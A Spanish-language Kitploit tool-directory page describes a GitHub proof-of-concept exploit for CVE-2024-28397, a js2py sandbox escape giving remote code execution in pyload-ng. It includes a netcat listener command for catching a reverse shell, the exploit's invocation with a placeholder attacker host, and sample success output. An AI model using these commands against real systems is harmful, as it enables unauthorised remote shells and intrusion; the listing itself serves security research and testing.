Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py- — Exploit PoC para CVE-2024-28397 – Ejecución remota de código en pyload-ng mediante escape de sandbox de js2py | Kitploit
Herramientas/GitHubGitHub/udayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones Web
GitHubudayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-

Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-

Exploit PoC para CVE-2024-28397 – Ejecución remota de código en pyload-ng mediante escape de sandbox de js2py

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 1 mesAún no revisado

Ejecución Remota de Código – CVE-2024-28397 (pyload-ng / js2py)

Este repositorio contiene un exploit de Prueba de Concepto (PoC) para CVE-2024-28397, una vulnerabilidad de Ejecución Remota de Código que afecta a pyload-ng debido al uso inseguro de js2py.

Aviso legal:
Esta PoC es solo para fines educativos y de investigación.
No la utilices en sistemas que no poseas o para los que no tengas permiso explícito de prueba.
El autor no es responsable del mal uso de este código.


Detalles de la Vulnerabilidad

  • CVE ID: CVE-2024-28397
  • Componente: js2py en pyload-ng
  • Impacto: Ejecución Remota de Código (RCE)
  • Vector de ataque: Un payload JS malicioso escapa del sandbox de js2py y ejecuta comandos arbitrarios del sistema.

Requisitos y Configuración

Necesitarás Python 3.x, la librería requests y netcat para capturar la reverse shell.

  • Objetivo → Instancia vulnerable de pyload-ng con el endpoint /run_code accesible

Listener → Inicia antes de ejecutar el exploit:

nc -lvnp 4444

Uso:

python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123

Ejemplo de Salida:

  • [+] ¡Registro exitoso!
  • [+] Inicio de sesión exitoso
  • [+] el exploit funcionó
Descargar herramienta